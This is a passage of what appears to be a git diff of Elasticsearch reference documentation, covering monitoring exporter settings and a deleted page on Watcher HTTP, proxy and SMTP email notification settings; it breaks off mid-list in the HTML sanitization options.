-(<>) Timeout for collecting the recovery -information, in <>. Defaults to `10s`. - -[[xpack-monitoring-history-duration]] -// tag::monitoring-history-duration-tag[] -`xpack.monitoring.history.duration` {ess-icon}:: -(<>) Retention duration beyond which the -indices created by a monitoring exporter are automatically deleted, in -<>. Defaults to `7d` (7 days). -+ --- -This setting has a minimum value of `1d` (1 day) to ensure that something is -being monitored and it cannot be disabled. - -IMPORTANT: This setting currently impacts only `local`-type exporters. Indices -created using the `http` exporter are not deleted automatically. - --- - -// end::monitoring-history-duration-tag[] - -`xpack.monitoring.exporters`:: -(<>) Configures where the agent stores monitoring -data. By default, the agent uses a local exporter that indexes monitoring data -on the cluster where it is installed. Use an HTTP exporter to send data to a -separate monitoring cluster. For more information, see -<>, -<>, and <>. - -[discrete] -[[local-exporter-settings]] -==== Local exporter settings - -The `local` exporter is the default exporter used by {monitor-features}. As the -name is meant to imply, it exports data to the _local_ cluster, which means that -there is not much needed to be configured. - -If you do not supply _any_ exporters, then the {monitor-features} automatically -create one for you. If any exporter is provided, then no default is added. - -[source,yaml] ----------------------------------- -xpack.monitoring.exporters.my_local: - type: local ----------------------------------- - -`type`:: -The value for a Local exporter must always be `local` and it is required. - -`use_ingest`:: -Whether to supply a placeholder pipeline to the cluster and a pipeline processor -with every bulk request. The default value is `true`. If disabled, then it means -that it will not use pipelines, which means that a future release cannot -automatically upgrade bulk requests to future-proof them. - -`cluster_alerts.management.enabled`:: - -Whether to create cluster alerts for this cluster. The default value is `true`. -To use this feature, {watcher} must be enabled. If you have a basic license, -cluster alerts are not displayed. - -`wait_master.timeout`:: -Time to wait for the master node to setup `local` exporter for monitoring, in -<>. After that wait period, the non-master nodes warn the -user for possible missing configuration. Defaults to `30s`. - -[discrete] -[[http-exporter-settings]] -==== HTTP exporter settings - -The following lists settings that can be supplied with the `http` exporter. -All settings are shown as what follows the name you select for your exporter: - -[source,yaml] ----------------------------------- -xpack.monitoring.exporters.my_remote: - type: http - host: ["host:port", ...] ----------------------------------- - -`type`:: -The value for an HTTP exporter must always be `http` and it is required. - -`host`:: -Host supports multiple formats, both as an array or as a single value. Supported -formats include `hostname`, `hostname:port`, -`http://hostname` `http://hostname:port`, `https://hostname`, and -`https://hostname:port`. Hosts cannot be assumed. The default scheme is always -`http` and the default port is always `9200` if not supplied as part of the -`host` string. -+ -[source,yaml] ----------------------------------- -xpack.monitoring.exporters: - example1: - type: http - host: "10.1.2.3" - example2: - type: http - host: ["http://10.1.2.4"] - example3: - type: http - host: ["10.1.2.5", "10.1.2.6"] - example4: - type: http - host: ["https://10.1.2.3:9200"] ----------------------------------- - -`auth.username`:: -The username is required if `auth.secure_password` or `auth.password` is -supplied. - -`auth.secure_password`:: -(<>, <>) The -password for the `auth.username`. Takes precedence over `auth.password` if it is -also specified. - -`auth.password`:: -deprecated:[7.7.0,"Use `auth.secure_password` instead."] The password for the -`auth.username`. If `auth.secure_password` is also specified, this setting is -ignored. - -`connection.timeout`:: -Amount of time that the HTTP connection is supposed to wait for a socket to open -for the request, in <>. The default value is `6s`. - -`connection.read_timeout`:: -Amount of time that the HTTP connection is supposed to wait for a socket to -send back a response, in <>. The default value is -`10 * connection.timeout` (`60s` if neither are set). - -`ssl`:: -Each HTTP exporter can define its own TLS / SSL settings or inherit them. See -<>. - -`proxy.base_path`:: -The base path to prefix any outgoing request, such as `/base/path` (e.g., bulk -requests would then be sent as `/base/path/_bulk`). There is no default value. - -`headers`:: -Optional headers that are added to every request, which can assist with routing -requests through proxies. -+ -[source,yaml] ----------------------------------- -xpack.monitoring.exporters.my_remote: - headers: - X-My-Array: [abc, def, xyz] - X-My-Header: abc123 ----------------------------------- -+ -Array-based headers are sent `n` times where `n` is the size of the array. -`Content-Type` and `Content-Length` cannot be set. Any headers created by the -monitoring agent will override anything defined here. - -`index.name.time_format`:: -A mechanism for changing the default date suffix for the, by default, daily -monitoring indices. The default value is `yyyy.MM.dd`, which is why the indices -are created daily. - -`use_ingest`:: -Whether to supply a placeholder pipeline to the monitoring cluster and a -pipeline processor with every bulk request. The default value is `true`. If -disabled, then it means that it will not use pipelines, which means that a -future release cannot automatically upgrade bulk requests to future-proof them. - -`cluster_alerts.management.enabled`:: -Whether to create cluster alerts for this cluster. The default value is `true`. -To use this feature, {watcher} must be enabled. If you have a basic license, -cluster alerts are not displayed. - -`cluster_alerts.management.blacklist`:: -Prevents the creation of specific cluster alerts. It also removes any applicable -watches that already exist in the current cluster. -+ --- -You can add any of the following watch identifiers to the list of blocked alerts: - -* `elasticsearch_cluster_status` -* `elasticsearch_version_mismatch` -* `elasticsearch_nodes` -* `kibana_version_mismatch` -* `logstash_version_mismatch` -* `xpack_license_expiration` - -For example: `["elasticsearch_version_mismatch","xpack_license_expiration"]`. --- - -[[ssl-monitoring-settings]] -:ssl-prefix: xpack.monitoring.exporters.$NAME -:component: {monitoring} -:verifies: -:server!: -:ssl-context: monitoring - -include::ssl-settings.asciidoc[] diff --git a/docs/reference/settings/notification-settings.asciidoc b/docs/reference/settings/notification-settings.asciidoc deleted file mode 100644 index 335bdf6bbda..00000000000 --- a/docs/reference/settings/notification-settings.asciidoc +++ /dev/null @@ -1,447 +0,0 @@ -[role="xpack"] -[[notification-settings]] -=== {watcher} settings in Elasticsearch - -[subs="attributes"] -++++ -{watcher} settings -++++ - -[[notification-settings-description]] -// tag::notification-settings-description-tag[] -You configure {watcher} settings to set up {watcher} and send notifications via -<>, -<>, and -<>. - -All of these settings can be added to the `elasticsearch.yml` configuration file, -with the exception of the secure settings, which you add to the {es} keystore. -For more information about creating and updating the {es} keystore, see -<>. Dynamic settings can also be updated across a cluster with the -<>. -// end::notification-settings-description-tag[] - -[[general-notification-settings]] -==== General Watcher Settings -`xpack.watcher.enabled`:: -(<>) -Set to `false` to disable {watcher} on the node. - -[[xpack-watcher-encrypt-sensitive-data]] -// tag::watcher-encrypt-sensitive-data-tag[] -`xpack.watcher.encrypt_sensitive_data` {ess-icon}:: -(<>) -Set to `true` to encrypt sensitive data. If this setting is enabled, you -must also specify the `xpack.watcher.encryption_key` setting. For more -information, see <>. -// end::watcher-encrypt-sensitive-data-tag[] - -`xpack.watcher.encryption_key`:: -(<>) -Specifies the path to a file that contains a key for encrypting sensitive data. -If `xpack.watcher.encrypt_sensitive_data` is set to `true`, this setting is -required. For more information, see <>. - -[[xpack-watcher-history-cleaner-service]] -// tag::watcher-history-cleaner-service-tag[] -`xpack.watcher.history.cleaner_service.enabled` {ess-icon}:: -(<>) -added:[6.3.0,Default changed to `true`.] -deprecated:[7.0.0,Watcher history indices are now managed by the `watch-history-ilm-policy` ILM policy] -+ -Set to `true` (default) to enable the cleaner service. The cleaner service -removes previous versions of {watcher} indices (for example, -`.watcher-history*`) when it determines that they are old. The duration of -{watcher} indices is determined by the `xpack.monitoring.history.duration` -setting, which defaults to 7 days. For more information about that setting, -see <>. -// end::watcher-history-cleaner-service-tag[] - -`xpack.http.proxy.host`:: -(<>) -Specifies the address of the proxy server to use to connect to HTTP services. - -`xpack.http.proxy.port`:: -(<>) -Specifies the port number to use to connect to the proxy server. - -`xpack.http.proxy.scheme`:: -(<>) -Protocol used to communicate with the proxy server. Valid values are `http` and -`https`. Defaults to the protocol used in the request. - -`xpack.http.default_connection_timeout`:: -(<>) -The maximum period to wait until abortion of the request, when a -connection is being initiated. - -`xpack.http.default_read_timeout`:: -(<>) -The maximum period of inactivity between two data packets, before the -request is aborted. - -`xpack.http.max_response_size`:: -(<>) -Specifies the maximum size an HTTP response is allowed to have, defaults to -`10mb`, the maximum configurable value is `50mb`. - -`xpack.http.whitelist`:: -(<>) -A list of URLs, that the internal HTTP client is allowed to connect to. This -client is used in the HTTP input, the webhook, the slack, pagerduty, -and jira actions. This setting can be updated dynamically. It defaults to `*` -allowing everything. Note: If you configure this setting and you are using one -of the slack/pagerduty actions, you have to ensure that the -corresponding endpoints are explicitly allowed as well. - -[[ssl-notification-settings]] -:ssl-prefix: xpack.http -:component: {watcher} HTTP -:verifies: -:server!: -:ssl-context: watcher - -include::ssl-settings.asciidoc[] - -[[email-notification-settings]] -==== Email Notification Settings -You can configure the following email notification settings in -`elasticsearch.yml`. For more information about sending notifications -via email, see <>. - -`xpack.notification.email.default_account`:: -(<>) -Default email account to use. -+ -If you configure multiple email accounts, you must either configure this setting -or specify the email account to use in the <> action. See -<>. - -`xpack.notification.email.account`:: -Specifies account information for sending notifications via email. You -can specify the following email account attributes: -+ --- -[[email-account-attributes]] - -`profile`:: -(<>) -The <> to use to build the MIME -messages that are sent from the account. Valid values: `standard`, `gmail` and -`outlook`. Defaults to `standard`. - -`email_defaults.*`:: -(<>) -An optional set of email attributes to use as defaults -for the emails sent from the account. See -<> for the supported -attributes. - -`smtp.auth`:: -(<>) -Set to `true` to attempt to authenticate the user using the -AUTH command. Defaults to `false`. - -`smtp.host`:: -(<>) -The SMTP server to connect to. Required. - -`smtp.port`:: -(<>) -The SMTP server port to connect to. Defaults to 25. - -`smtp.user`:: -(<>) -The user name for SMTP. Required. - -`smtp.secure_password`:: -(<>, <>) -The password for the specified SMTP user. - -`smtp.starttls.enable`:: -(<>) -Set to `true` to enable the use of the `STARTTLS` -command (if supported by the server) to switch the connection to a -TLS-protected connection before issuing any login commands. Note that -an appropriate trust store must be configured so that the client will -trust the server's certificate. Defaults to `false`. - -`smtp.starttls.required`:: -(<>) -If `true`, then `STARTTLS` will be required. If that command fails, the -connection will fail. Defaults to `false`. - -`smtp.ssl.trust`:: -(<>) -A list of SMTP server hosts that are assumed trusted and for which -certificate verification is disabled. If set to "*", all hosts are -trusted. If set to a whitespace separated list of hosts, those hosts -are trusted. Otherwise, trust depends on the certificate the server -presents. - -`smtp.timeout`:: -(<>) -The socket read timeout. Default is two minutes. - -`smtp.connection_timeout`:: -(<>) -The socket connection timeout. Default is two minutes. - -`smtp.write_timeout`:: -(<>) -The socket write timeout. Default is two minutes. - -`smtp.local_address`:: -(<>) -A configurable local address when sending emails. Not configured by default. - -`smtp.local_port`:: -(<>) -A configurable local port when sending emails. Not configured by default. - -`smtp.send_partial`:: -(<>) -Send an email, despite one of the receiver addresses being invalid. - -`smtp.wait_on_quit`:: -(<>) -If set to false the QUIT command is sent and the connection closed. If set to -true, the QUIT command is sent and a reply is waited for. True by default. --- - -`xpack.notification.email.html.sanitization.allow`:: -Specifies the HTML elements that are allowed in email notifications. For -more information, see -<>. You can -specify individual HTML elements and the following HTML feature groups: -+ --- -[[html-feature-groups]] - -`_tables`:: -(<>) -All table related elements: ``, ``, ``, ``, ``, ``, and ``. - -`_blocks`:: -(<>) -The following block elements: `

`, `

`, `

`, -`

`, `

`, `

`, `

`, `
`, `
`, `
`, `
`, -`